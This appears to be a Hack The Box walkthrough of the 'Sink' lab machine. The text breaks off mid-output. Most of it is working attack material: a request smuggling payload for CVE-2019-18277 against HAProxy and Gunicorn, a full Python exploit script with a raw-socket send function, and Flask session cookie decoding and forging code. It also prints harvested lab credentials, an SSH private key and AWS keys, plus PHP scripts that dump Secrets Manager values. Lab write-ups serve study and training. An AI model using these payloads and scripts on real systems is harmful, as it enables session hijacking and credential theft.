Hack-The-Box-walkthrough[sink]

Introduction

OS: Linux
Difficulty: Insane
Points: 50
Release: 30 Jan 2021
IP: 10.10.10.225


information gathering

First, run nmap as usual:

┌──(root💀kali)-[~/hackthebox/machine/sink]
└─# nmap -sV -v -p- --min-rate=10000 10.10.10.225
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
3000/tcp open ppp?
3971/tcp filtered lanrevserver
5000/tcp open http Gunicorn 20.0.0
5502/tcp filtered fcp-srvr-inst1
15587/tcp filtered unknown
33076/tcp filtered unknown
33578/tcp filtered unknown
34042/tcp filtered unknown
35365/tcp filtered unknown
35514/tcp filtered unknown
37653/tcp filtered unknown
49460/tcp filtered unknown
52393/tcp filtered unknown
61352/tcp filtered unknown
62934/tcp filtered unknown
64002/tcp filtered unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.91%I=7%D=2/8%Time=6020CC14%P=x86_64-pc-linux-gnu%r(Gen
SF:ericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20te
SF:xt/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x2
SF:0Request")%r(GetRequest,1000,"HTTP/1\.0\x20200\x20OK\r\nContent-Type:\x
SF:20text/html;\x20charset=UTF-8\r\nSet-Cookie:\x20lang=en-US;\x20Path=/;\
SF:x20Max-Age=2147483647\r\nSet-Cookie:\x20i_like_gitea=592127b437b6a2ef;\
SF:x20Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf=PccXCCJkvDgYnPWvzV9xVDHs
SF:7ac6MTYxMjc2MjI5NDgwMDY5NzAyMA;\x20Path=/;\x20Expires=Tue,\x2009\x20Feb
SF:\x202021\x2005:31:34\x20GMT;\x20HttpOnly\r\nX-Frame-Options:\x20SAMEORI
SF:GIN\r\nDate:\x20Mon,\x2008\x20Feb\x202021\x2005:31:34\x20GMT\r\n\r\n<!D
SF:OCTYPE\x20html>\n<html\x20lang=\"en-US\"\x20class=\"theme-\">\n<head\x2
SF:0data-suburl=\"\">\n\t<meta\x20charset=\"utf-8\">\n\t<meta\x20name=\"vi
SF:ewport\"\x20content=\"width=device-width,\x20initial-scale=1\">\n\t<met
SF:a\x20http-equiv=\"x-ua-compatible\"\x20content=\"ie=edge\">\n\t<title>\
SF:x20Gitea:\x20Git\x20with\x20a\x20cup\x20of\x20tea\x20</title>\n\t<link\
SF:x20rel=\"manifest\"\x20href=\"/manifest\.json\"\x20crossorigin=\"use-cr
SF:edentials\">\n\t<meta\x20name=\"theme-color\"\x20content=\"#6cc644\">\n
SF:\t<meta\x20name=\"author\"\x20content=\"Gitea\x20-\x20Git\x20with\x20a\
SF:x20cup\x20of\x20tea\"\x20/>\n\t<meta\x20name=\"description\"\x20content
SF:=\"Gitea\x20\(Git\x20with\x20a\x20cup\x20of\x20tea\)\x20is\x20a\x20pain
SF:less")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x
SF:20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Ba
SF:d\x20Request")%r(HTTPOptions,1541,"HTTP/1\.0\x20404\x20Not\x20Found\r\n
SF:Content-Type:\x20text/html;\x20charset=UTF-8\r\nSet-Cookie:\x20lang=en-
SF:US;\x20Path=/;\x20Max-Age=2147483647\r\nSet-Cookie:\x20i_like_gitea=9fc
SF:180b318dbde9c;\x20Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf=5Ky4gK3kv
SF:oCly7f1byXVrrmaJuM6MTYxMjc2MjMwMTk2Njg0MjIyMA;\x20Path=/;\x20Expires=Tu
SF:e,\x2009\x20Feb\x202021\x2005:31:41\x20GMT;\x20HttpOnly\r\nX-Frame-Opti
SF:ons:\x20SAMEORIGIN\r\nDate:\x20Mon,\x2008\x20Feb\x202021\x2005:31:41\x2
SF:0GMT\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en-US\"\x20class=\"them
SF:e-\">\n<head\x20data-suburl=\"\">\n\t<meta\x20charset=\"utf-8\">\n\t<me
SF:ta\x20name=\"viewport\"\x20content=\"width=device-width,\x20initial-sca
SF:le=1\">\n\t<meta\x20http-equiv=\"x-ua-compatible\"\x20content=\"ie=edge
SF:\">\n\t<title>Page\x20Not\x20Found\x20-\x20\x20Gitea:\x20Git\x20with\x2
SF:0a\x20cup\x20of\x20tea\x20</title>\n\t<link\x20rel=\"manifest\"\x20href
SF:=\"/manifest\.json\"\x20crossorigin=\"use-credentials\">\n\t<meta\x20na
SF:me=\"theme-color\"\x20content=\"#6cc644\">\n\t<meta\x20name=\"author\"\
SF:x20content=\"Gitea\x20-\x20Git\x20with\x20a\x20cup\x20of\x20tea\"\x20/>
SF:\n\t<meta\x20name=\"description\"\x20content=\"Gitea\x20\(Git\x20with\x
SF:20a\x20c");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

port 3000

Port 3000 is Gitea (the fingerprint above shows the Gitea title and the i_like_gitea cookie).

port 5000

Port 5000 is the DevOps web app.

devops

Register any account on port 5000 and log in. The response headers show HAProxy sitting in front of Gunicorn:

HTTP/1.1 200 OK
Server: gunicorn/20.0.0
Date: Mon, 08 Feb 2021 05:45:01 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 6392
Vary: Cookie
Via: haproxy
X-Served-By: a3bb59be4ff6

Searching on that HAProxy + Gunicorn combination turns up an HTTP request smuggling vulnerability:

  • HAProxy HTTP request smuggling (CVE-2019-18277)

request smuggling

Register and log in, then post a comment that carries a smuggled second request. The smuggled POST /comment declares a Content-Length (300) far larger than the `msg=` it actually sends, so the back end keeps reading and the next request arriving on that connection, a periodic one sent by the admin, becomes the rest of the `msg` value and is stored as a comment. Go to /home afterwards and the admin's request headers are displayed there as a comment. Two things to check when reproducing: CVE-2019-18277 depends on a Transfer-Encoding value that HAProxy rejects (so it frames the body by Content-Length) while Gunicorn still treats it as chunked; the public PoC puts a vertical tab (\x0b) in front of `chunked`, and a control byte like that does not survive copy-paste, so inspect that header in a hex view rather than trusting the printable rendering below. And the outer Content-Length (358) is computed to cover the whole chunked body plus the smuggled request, so turn off automatic Content-Length updating in your proxy before sending.

  • payload request
POST /comment HTTP/1.1
Host: 10.10.10.225:5000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 358
Origin: http://10.10.10.225:5000
Connection: keep-alive
Referer: http://10.10.10.225:5000/home
Cookie: lang=zh-CN; i_like_gitea=1e8c376ed33ccd6e; _csrf=bsRZO43k9rTxqa5xKtfSmm747Y86MTYxMjc2MjIxNjA0MTE3MDI2MA; session=eyJlbWFpbCI6IjExODUxNTE4NjdAcXEuY29tIn0.YCDPxQ.cL41EY7kCeXTgvXKY-wD348qaDE
Upgrade-Insecure-Requests: 1
Transfer-Encoding: chunked

5
msg=a
0

POST /comment HTTP/1.1
Host: localhost:5000
Cookie: lang=zh-CN; i_like_gitea=1e8c376ed33ccd6e; _csrf=bsRZO43k9rTxqa5xKtfSmm747Y86MTYxMjc2MjIxNjA0MTE3MDI2MA; session=eyJlbWFpbCI6IjExODUxNTE4NjdAcXEuY29tIn0.YCDPxQ.cL41EY7kCeXTgvXKY-wD348qaDE
Content-Length: 300
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded

msg=

The admin's request is captured as a comment, and it carries the admin's session cookie:

GET /notes/delete/1234 HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: gzip, deflate
Accept: */*
Cookie: session=eyJlbWFpbCI6ImFkbWluQHNpbmsuaHRiIn0.YB75fQ.Gp1wldORpfX5Ry7FC4mcewT-YCU
X-Forwarded-For: 127.0.0.1
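The desync that produced the comment above, as an added example (not code from the writeup): it builds the same two-request payload with the Content-Length computed rather than hand-counted, then walks two parsers over the identical bytes, one framing by Content-Length as HAProxy does once it rejects the Transfer-Encoding value (CVE-2019-18277 uses a vertical tab before `chunked`), one framing by chunks as Gunicorn does. Assumed here: the back end treats any Transfer-Encoding header as chunked, the target address is the box from the writeup, the session cookie is a placeholder for your own, and the victim request is a constructed stand-in modelled on the admin's captured one.

```python
"""CL.TE desync against the HAProxy -> Gunicorn chain, modelled on the payload above."""
import socket

TARGET = ("10.10.10.225", 5000)                # the box, as in the writeup
ATTACKER_COOKIE = "session=YOUR_SESSION_HERE"  # placeholder: your own logged-in session


def build_payload(host: str, cookie: str, capture_len: int = 300) -> bytes:
    """Outer request (framed by Content-Length for HAProxy) wrapping an inner
    request that Gunicorn will parse as a *second* request."""
    inner = (
        "POST /comment HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Cookie: {cookie}\r\n"
        # Larger than the body actually sent ("msg="): the back end keeps reading
        # and the next request on the reused connection becomes part of msg.
        f"Content-Length: {capture_len}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        "\r\n"
        "msg="
    ).encode()
    chunked_body = b"5\r\nmsg=a\r\n0\r\n\r\n"  # all that Gunicorn credits to request 1
    body = chunked_body + inner
    outer = (
        "POST /comment HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Cookie: {cookie}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"  # exact: chunked body + inner request
        # Vertical tab before "chunked": HAProxy does not recognise the value and
        # falls back to Content-Length; Gunicorn tolerates it and reads chunked.
        "Transfer-Encoding: \x0bchunked\r\n"
        "\r\n"
    ).encode()
    return outer + body


def _split(buf: bytes):
    head, _, rest = buf.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return head, headers, rest


def frame_by_content_length(buf: bytes):
    """Front-end view: body is exactly Content-Length bytes, the rest is the next request."""
    head, headers, rest = _split(buf)
    n = int(headers[b"content-length"])
    return head, rest[:n], rest[n:]


def frame_by_chunked(buf: bytes):
    """Back-end view: body is read chunk by chunk until the zero-size chunk."""
    head, _, rest = _split(buf)
    body = b""
    while True:
        size_line, _, rest = rest.partition(b"\r\n")
        size = int(size_line, 16)
        if size == 0:
            rest = rest.partition(b"\r\n")[2]  # drop the CRLF that ends the body
            return head, body, rest
        body += rest[:size]
        rest = rest[size + 2:]                 # skip chunk data plus its CRLF


def simulate(payload: bytes, victim_request: bytes) -> dict:
    """Walk both parsers over the same bytes to show where they disagree."""
    _, _, fe_rest = frame_by_content_length(payload)      # HAProxy: one request, nothing left
    _, first_body, leftover = frame_by_chunked(payload)   # Gunicorn: request 1 ends at the 0-chunk
    # Request 2 (the leftover) has Content-Length 300 and only "msg=" so far, so the
    # victim's request on the reused connection is read as the remainder of msg.
    _, captured, _ = frame_by_content_length(leftover + victim_request)
    return {
        "frontend_leftover": fe_rest,
        "backend_first_body": first_body,
        "backend_second_request_line": leftover.split(b"\r\n", 1)[0],
        "captured_comment": captured,
    }


def send_raw(payload: bytes, target=TARGET) -> bytes:
    """Deliver the payload over a plain socket so nothing rewrites Content-Length."""
    with socket.create_connection(target, timeout=10) as s:
        s.sendall(payload)
        return s.recv(4096)


# Constructed stand-in for the admin's scheduled request captured in the writeup.
VICTIM_REQUEST = (
    b"GET /notes/delete/1234 HTTP/1.1\r\n"
    b"Host: 127.0.0.1:8080\r\n"
    b"Cookie: session=ADMIN_SESSION_PLACEHOLDER\r\n"
    b"X-Forwarded-For: 127.0.0.1\r\n\r\n"
)

if __name__ == "__main__":
    result = simulate(build_payload("10.10.10.225:5000", ATTACKER_COOKIE), VICTIM_REQUEST)
    print(result["captured_comment"].decode())  # what ends up as the comment on /home
    # send_raw(build_payload("10.10.10.225:5000", ATTACKER_COOKIE))  # live run, then check /home
```

The capture length is the knob to tune: it must exceed the victim's request so the whole thing, cookie included, lands in `msg`, but the back end will not finish request 2 until that many bytes have arrived, so later traffic on the same reused connection fills the remainder.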

Admin cookie

Cookie: session=eyJlbWFpbCI6ImFkbWluQHNpbmsuaHRiIn0.YB75fQ.Gp1wldORpfX5Ry7FC4mcewT-YCU

admin

Swap your session cookie for the admin's one and you are now admin.
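Why replaying that cookie is enough, and what forging one instead would take, as an added example (not the writeup's code). Flask's default session cookie is an itsdangerous URLSafeTimedSerializer token: base64(json).base64(timestamp).signature, signed with HMAC-SHA1 under a key derived from SECRET_KEY with the salt "cookie-session". The payload is readable by anyone holding the cookie; only minting a new one needs the key. The two cookies are the ones captured above; the secret keys used in the demo are made up.

```python
"""Decode, verify and (given the key) mint Flask session cookies."""
import base64
import hashlib
import hmac
import json
import zlib

# Cookies from the writeup: the attacker's own session and the captured admin one.
ATTACKER_COOKIE = "eyJlbWFpbCI6IjExODUxNTE4NjdAcXEuY29tIn0.YCDPxQ.cL41EY7kCeXTgvXKY-wD348qaDE"
ADMIN_COOKIE = "eyJlbWFpbCI6ImFkbWluQHNpbmsuaHRiIn0.YB75fQ.Gp1wldORpfX5Ry7FC4mcewT-YCU"
SALT = b"cookie-session"   # Flask's SecureCookieSessionInterface salt


def _b64d(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))  # itsdangerous strips '='


def _b64e(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def decode_session(cookie: str) -> dict:
    """Payload, signing time and signature, without knowing SECRET_KEY."""
    compressed = cookie.startswith(".")        # leading '.' means zlib-compressed payload
    payload_b64, ts_b64, sig_b64 = cookie.lstrip(".").split(".")
    raw = _b64d(payload_b64)
    if compressed:
        raw = zlib.decompress(raw)
    # Big-endian integer; itsdangerous 2.x counts from the Unix epoch, 1.x from 2011-01-01.
    timestamp = int.from_bytes(_b64d(ts_b64), "big")
    return {"payload": json.loads(raw), "timestamp": timestamp, "signature": sig_b64}


def _signature(secret_key: bytes, signed_value: bytes) -> bytes:
    key = hmac.new(secret_key, SALT, hashlib.sha1).digest()   # key_derivation="hmac"
    return hmac.new(key, signed_value, hashlib.sha1).digest()


def verify_session(cookie: str, secret_key: bytes) -> bool:
    """True only if the signature was produced with secret_key."""
    signed_value, _, sig_b64 = cookie.rpartition(".")
    return hmac.compare_digest(_signature(secret_key, signed_value.encode()), _b64d(sig_b64))


def sign_session(payload: dict, secret_key: bytes, timestamp: int) -> str:
    """Mint a cookie the way Flask does; only possible with the real SECRET_KEY."""
    body = json.dumps(payload, separators=(",", ":")).encode()
    ts = timestamp.to_bytes((timestamp.bit_length() + 7) // 8, "big")
    signed_value = _b64e(body) + "." + _b64e(ts)
    return signed_value + "." + _b64e(_signature(secret_key, signed_value.encode()))


if __name__ == "__main__":
    for name, cookie in (("attacker", ATTACKER_COOKIE), ("admin", ADMIN_COOKIE)):
        print(name, decode_session(cookie))
    # Without SECRET_KEY the admin cookie can only be replayed, not forged or altered:
    print("signed with 'secret'?", verify_session(ADMIN_COOKIE, b"secret"))
```

The decoded payloads are `{"email": "1185151867@qq.com"}` and `{"email": "admin@sink.htb"}`: the application identifies the user by e-mail alone and the cookie is a bearer token with no binding to client address or user agent, which is exactly why pasting it into another browser works. If a SECRET_KEY ever leaks (a committed config, a default from a tutorial), `sign_session` is all an attacker needs to become any user.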

notes

The admin's three notes hold credentials for three different systems:

Chef Login : http://chef.sink.htb Username : chefadm Password : /6'fEGC&zEx{4]zz
Dev Node URL : http://code.sink.htb Username : root Password : FaH@3L>Z3})zzfQ3
Nagios URL : https://nagios.sink.htb Username : nagios_adm Password : g8<H6GK\{*L.fB3C

gitea

The Dev Node (code.sink.htb) credentials also log in to Gitea on port 3000:

root : FaH@3L>Z3})zzfQ3

Key_Management

In the commit history of Key_Management there is marcus's SSH private key:

http://10.10.10.225:3000/root/Key_Management/commit/b01a6b7ed372d154ed0bc43a342a5e1203d07b1e
  • id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

user flag

SSH in as marcus with that private key and read user.txt:

┌──(root💀kali)-[~/hackthebox/machine/sink]
└─# ssh -i id_rsa marcus@10.10.10.225
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-53-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Mon 08 Feb 2021 10:18:34 AM UTC

System load: 0.2
Usage of /: 40.5% of 17.59GB
Memory usage: 63%
Swap usage: 1%
Processes: 305
Users logged in: 0
IPv4 address for br-85739d6e29c0: 172.18.0.1
IPv4 address for docker0: 172.17.0.1
IPv4 address for ens160: 10.10.10.225
IPv6 address for ens160: dead:beef::250:56ff:feb9:8eea


79 updates can be installed immediately.
26 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Sun Feb 7 17:56:51 2021 from 10.10.14.12
marcus@sink:~$ id
uid=1001(marcus) gid=1001(marcus) groups=1001(marcus)
marcus@sink:~$ whoami
marcus
marcus@sink:~$ ls
user.txt
marcus@sink:~$ cat user.txt
f9e781e7a74603e7e49c3749fe6182e0

AWS

The Key_Management code is mostly AWS SDK calls, so it can be reused as a base. Clone the code: it talks to an endpoint on 127.0.0.1:4566 (a LocalStack instance, judging by the x-localstack-target header in the responses), which has to be forwarded over SSH, and the access key and secret are in a Log_Management commit:

http://10.10.10.225:3000/root/Log_Management/commit/e8d68917f2570f3695030d0ded25dc95738fb1ba

'key' => 'AKIAIUEN3QWCPSTEITJQ',
'secret' => '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'
ssh -N -L 4566:127.0.0.1:4566 -i id_rsa marcus@10.10.10.225

list secrets

  • list_secrets.php
<?php
require 'vendor/autoload.php';

use Aws\SecretsManager\SecretsManagerClient;
use Aws\Exception\AwsException;

// Same client settings as the Key_Management code: the LocalStack endpoint
// forwarded to 127.0.0.1:4566 over SSH, and the key/secret from Log_Management.
$client = new SecretsManagerClient([
    'region'      => 'eu',
    'endpoint'    => 'http://127.0.0.1:4566',
    'credentials' => [
        'key'    => 'AKIAIUEN3QWCPSTEITJQ',
        'secret' => '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'
    ],
    'version'     => 'latest'
]);

try {
    // ListSecrets returns names and ARNs only; the values need GetSecretValue.
    $result = $client->listSecrets([]);
    var_dump($result);
} catch (AwsException $e) {
    echo $e->getMessage();
    echo "\n";
}
?>

Run the PHP script:

┌──(root💀kali)-[~/hackthebox/machine/sink]
└─# php list_secrets.php
object(Aws\Result)#128 (2) {
["data":"Aws\Result":private]=>
array(2) {
["SecretList"]=>
array(3) {
[0]=>
array(9) {
["ARN"]=>
string(70) "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jenkins Login-ElTxf"
["Name"]=>
string(13) "Jenkins Login"
["Description"]=>
string(39) "Master Server to manage release cycle 1"
["KmsKeyId"]=>
string(0) ""
["RotationEnabled"]=>
bool(false)
["RotationLambdaARN"]=>
string(0) ""
["RotationRules"]=>
array(1) {
["AutomaticallyAfterDays"]=>
int(0)
}
["Tags"]=>
array(0) {
}
["SecretVersionsToStages"]=>
array(1) {
["f5bfe052-d05c-46ec-a317-e563c9be2760"]=>
array(1) {
[0]=>
string(10) "AWSCURRENT"
}
}
}
[1]=>
array(9) {
["ARN"]=>
string(67) "arn:aws:secretsmanager:us-east-1:1234567890:secret:Sink Panel-qZfJI"
["Name"]=>
string(10) "Sink Panel"
["Description"]=>
string(46) "A panel to manage the resources in the devnode"
["KmsKeyId"]=>
string(0) ""
["RotationEnabled"]=>
bool(false)
["RotationLambdaARN"]=>
string(0) ""
["RotationRules"]=>
array(1) {
["AutomaticallyAfterDays"]=>
int(0)
}
["Tags"]=>
array(0) {
}
["SecretVersionsToStages"]=>
array(1) {
["32cf640a-5ef1-4f84-bd9e-2ab3c6514a53"]=>
array(1) {
[0]=>
string(10) "AWSCURRENT"
}
}
}
[2]=>
array(9) {
["ARN"]=>
string(69) "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jira Support-GoJSC"
["Name"]=>
string(12) "Jira Support"
["Description"]=>
string(22) "Manage customer issues"
["KmsKeyId"]=>
string(0) ""
["RotationEnabled"]=>
bool(false)
["RotationLambdaARN"]=>
string(0) ""
["RotationRules"]=>
array(1) {
["AutomaticallyAfterDays"]=>
int(0)
}
["Tags"]=>
array(0) {
}
["SecretVersionsToStages"]=>
array(1) {
["8dfff6f9-3250-4577-9f57-f5e945c828ba"]=>
array(1) {
[0]=>
string(10) "AWSCURRENT"
}
}
}
}
["@metadata"]=>
array(4) {
["statusCode"]=>
int(200)
["effectiveUri"]=>
string(21) "http://127.0.0.1:4566"
["headers"]=>
array(9) {
["content-type"]=>
string(24) "text/html; charset=utf-8"
["content-length"]=>
string(4) "1679"
["access-control-allow-origin"]=>
string(1) "*"
["access-control-allow-methods"]=>
string(38) "HEAD,GET,PUT,POST,DELETE,OPTIONS,PATCH"
["access-control-allow-headers"]=>
string(196) "authorization,content-type,content-md5,cache-control,x-amz-content-sha256,x-amz-date,x-amz-security-token,x-amz-user-agent,x-amz-target,x-amz-acl,x-amz-version-id,x-localstack-target,x-amz-tagging"
["access-control-expose-headers"]=>
string(16) "x-amz-version-id"
["connection"]=>
string(5) "close"
["date"]=>
string(29) "Mon, 08 Feb 2021 10:49:11 GMT"
["server"]=>
string(13) "hypercorn-h11"
}
["transferStats"]=>
array(1) {
["http"]=>
array(1) {
[0]=>
array(0) {
}
}
}
}
}
["monitoringEvents":"Aws\Result":private]=>
array(0) {
}
}

get secret values

  • get_secret_values.php
<?php
require 'vendor/autoload.php';

use Aws\SecretsManager\SecretsManagerClient;
use Aws\Exception\AwsException;

$client = new SecretsManagerClient([
    'region'      => 'eu',
    'endpoint'    => 'http://127.0.0.1:4566',
    'credentials' => [
        'key'    => 'AKIAIUEN3QWCPSTEITJQ',
        'secret' => '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'
    ],
    'version'     => 'latest'
]);

// ARNs taken from the ListSecrets output above.
$secretIDs = [
    "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jenkins Login-ElTxf",
    "arn:aws:secretsmanager:us-east-1:1234567890:secret:Sink Panel-qZfJI",
    "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jira Support-GoJSC"
];

// One try/catch per secret, so a failure on one ARN does not stop the rest.
foreach ($secretIDs as $secretID) {
    try {
        $result = $client->getSecretValue([
            'SecretId' => $secretID,
        ]);
        var_dump($result);
    } catch (AwsException $e) {
        echo $e->getMessage();
        echo "\n";
    }
}

Run the PHP script:

┌──(root💀kali)-[~/hackthebox/machine/sink]
└─# php get_secret_values.php
object(Aws\Result)#101 (2) {
["data":"Aws\Result":private]=>
array(7) {
["ARN"]=>
string(70) "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jenkins Login-ElTxf"
["Name"]=>
string(13) "Jenkins Login"
["VersionId"]=>
string(36) "f5bfe052-d05c-46ec-a317-e563c9be2760"
["SecretString"]=>
string(57) "{"username":"john@sink.htb","password":"R);\)ShS99mZ~8j"}"
["VersionStages"]=>
array(1) {
[0]=>
string(10) "AWSCURRENT"
}
["CreatedDate"]=>
object(Aws\Api\DateTimeResult)#97 (3) {
["date"]=>
string(26) "2021-02-06 20:18:57.000000"
["timezone_type"]=>
int(1)
["timezone"]=>
string(6) "+00:00"
}
["@metadata"]=>
array(4) {
["statusCode"]=>
int(200)
["effectiveUri"]=>
string(21) "http://127.0.0.1:4566"
["headers"]=>
array(9) {
["content-type"]=>
string(24) "text/html; charset=utf-8"
["content-length"]=>
string(3) "305"
["access-control-allow-origin"]=>
string(1) "*"
["access-control-allow-methods"]=>
string(38) "HEAD,GET,PUT,POST,DELETE,OPTIONS,PATCH"
["access-control-allow-headers"]=>
string(196) "authorization,content-type,content-md5,cache-control,x-amz-content-sha256,x-amz-date,x-amz-security-token,x-amz-user-agent,x-amz-target,x-amz-acl,x-amz-version-id,x-localstack-target,x-amz-tagging"
["access-control-expose-headers"]=>
string(16) "x-amz-version-id"
["connection"]=>
string(5) "close"
["date"]=>
string(29) "Mon, 08 Feb 2021 10:54:12 GMT"
["server"]=>
string(13) "hypercorn-h11"
}
["transferStats"]=>
array(1) {
["http"]=>
array(1) {
[0]=>
array(0) {
}
}
}
}
}
["monitoringEvents":"Aws\Result":private]=>
array(0) {
}
}
object(Aws\Result)#126 (2) {
["data":"Aws\Result":private]=>
array(7) {
["ARN"]=>
string(67) "arn:aws:secretsmanager:us-east-1:1234567890:secret:Sink Panel-qZfJI"
["Name"]=>
string(10) "Sink Panel"
["VersionId"]=>
string(36) "32cf640a-5ef1-4f84-bd9e-2ab3c6514a53"
["SecretString"]=>
